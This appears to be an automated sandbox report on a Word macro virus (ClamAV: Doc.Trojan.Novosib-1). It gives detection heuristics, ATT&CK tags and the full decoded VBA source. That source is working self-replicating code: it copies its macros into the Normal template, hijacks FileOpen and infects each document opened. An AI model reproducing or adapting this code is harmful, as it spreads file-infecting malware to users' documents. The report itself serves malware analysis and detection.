MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing VBA macros. The AutoOpen macro is present and designed to execute other macros, including 'Fantom' and 'Fuck'. The presence of the 'Doc.Trojan.Novosib-1' ClamAV detection strongly suggests this is a known malware family. The AutoOpen macro is a common technique for initial execution of malicious code within Office documents.
Heuristics: 4
- ClamAV: Doc.Trojan.Novosib-1 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Novosib-1
- VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS: Document contains VBA macro code
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2491 bytes |

SHA-256: 6cc41f4034d671fb535b364b1251acdbe6d0ea6bd48f6f98fb3ed92923d8ba2f

Preview script (first 1,000 lines of the extracted script):
```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"

Public Sub MAIN()
    Dim rus
    Dim j, Response, Msg, Style
    Dim i
    Style = vbCritical
    Msg = "Произошла критическая ошибка.Перезапустите приложение. "
    On Error GoTo -1: On Error GoTo fail
    rus = 0
    j = WordBasic.CountMacros(0, 0)
    For i = 1 To j
        If WordBasic.[MacroName$](i, 0, 0) = "Fantom" Then rus = 1
    Next i
    If rus = 1 Then GoTo fail
    Response = MsgBox(Msg, Style)
    WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoOpen", "Normal:AutoOp"
    WordBasic.MacroCopy WordBasic.[FileName$]() + ":Fantom", "Normal:Fantom"
    WordBasic.MacroCopy WordBasic.[FileName$]() + ":Fuck", "Normal:FileOpen"
fail:
End Sub

Attribute VB_Name = "Fantom"

Public Sub MAIN()
    'Dedicated to Igor Danilov
    'An evil virus writer from Novosibirsk
End Sub

Attribute VB_Name = "Fuck"

Public Sub MAIN()
    Dim Novosib
    Dim Virus
    Dim Msg, Msb, Msa, Style, MyString, Response
    Dim Kota
    Dim Mordov
    Dim i
    Dim zuko
    Style = vbYesNo + DefaultButton2
    Msg = "Сдаётся мне что вы мудак батенька?"
    Msa = "Зря вы батенька такого высокого мнения о себе!"
    Msb = "Вот тут я с вами полностью согласен!"
    ' this macro loaded in normal template as FileOpen
    Virus = "Fuck"
    Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileOpen(False)
    On Error GoTo -1: On Error GoTo fail
    WordBasic.CurValues.FileOpen dlg
    WordBasic.Dialog.FileOpen dlg
    WordBasic.FileOpen dlg
    Response = MsgBox(Msg, Style)
    If Response = vbYes Then
        MyString = "Да"
        Response = MsgBox(Msb)
        GoTo fol
    Else
        MyString = "Нет"
        Response = MsgBox(Msa)
fol:
        Kota = 0
        Mordov = WordBasic.CountMacros(1, 0, 0)
        For i = 1 To Mordov
            zuko = WordBasic.[MacroName$](i, 1)
            If zuko = "Fantom" Then Kota = 1
        Next i
        If Kota = 1 Then GoTo fail
        WordBasic.FileSaveAs WordBasic.[FileName$](), Format:=1
        WordBasic.MacroCopy "Normal:AutoOp", WordBasic.[FileName$]() + ":AutoOpen"
        WordBasic.MacroCopy "Normal:Fantom", WordBasic.[FileName$]() + ":Fantom"
        WordBasic.MacroCopy "Normal:FileOpen", WordBasic.[FileName$]() + ":Fuck"
fail:
    End If
End Sub
```